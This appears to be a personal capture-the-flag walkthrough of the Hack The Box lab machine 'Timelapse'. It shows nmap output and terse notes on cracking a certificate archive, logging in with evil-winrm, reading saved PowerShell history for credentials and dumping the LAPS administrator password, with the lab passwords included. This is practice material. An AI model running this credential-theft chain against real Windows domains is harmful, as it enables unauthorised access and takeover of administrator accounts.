⏱️

Timelapse

 
53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49729,57404
# Nmap 7.94SVN scan initiated Tue Jan 2 15:27:13 2024 as: nmap -sT -sC -sV -O -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49729,57404 -oA nmap/detail 10.10.11.152 Nmap scan report for 10.10.11.152 (10.10.11.152) Host is up (0.096s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-02 15:27:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 | tls-alpn: |_ http/1.1 |_http-title: Not Found |_ssl-date: 2024-01-02T15:28:57+00:00; +8h00m00s from scanner time. | ssl-cert: Subject: commonName=dc01.timelapse.htb | Not valid before: 2021-10-25T14:05:29 |_Not valid after: 2022-10-25T14:25:29 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49729/tcp open msrpc Microsoft Windows RPC 57404/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (89%) Aggressive OS guesses: Microsoft Windows Server 2019 (89%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2024-01-02T15:28:19 |_ start_date: N/A |_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jan 2 15:29:00 2024 -- 1 IP address (1 host up) scanned in 108.03 seconds
notion image
notion image
dc01.timelapse.htb timelapse.htb
notion image
notion image
notion image
get zip files with password from smb, then use john to crack
notion image
 
then unzip, get a .pfx file
notion image
googling
requiring another password
pfx2john legacyy_dev_auth.pfx > pfxhash
continue cracking, then get
thuglegacy (legacyy_dev_auth.pfx)
notion image
googling
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt openssl rsa -in private.pem -out private2.pem
 
evil-winrm -i timelapse.htb -S -k private2.pem -c cert.crt
notion image
logged as legacyy
notion image
type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
notion image
svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
evil-winrm -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -i 10.10.11.152 -S
notion image
svc_deploy is able to read LAPS
Get-ADComputer DC01 -property 'ms-mcs-admpwd'
notion image
Get-ADComputer DC01 -property *
notion image
evil-winrm -u administrator -p '2,uA]7+o3x785.&Ko[1Eh34(' -S -i 10.10.11.152
notion image
success!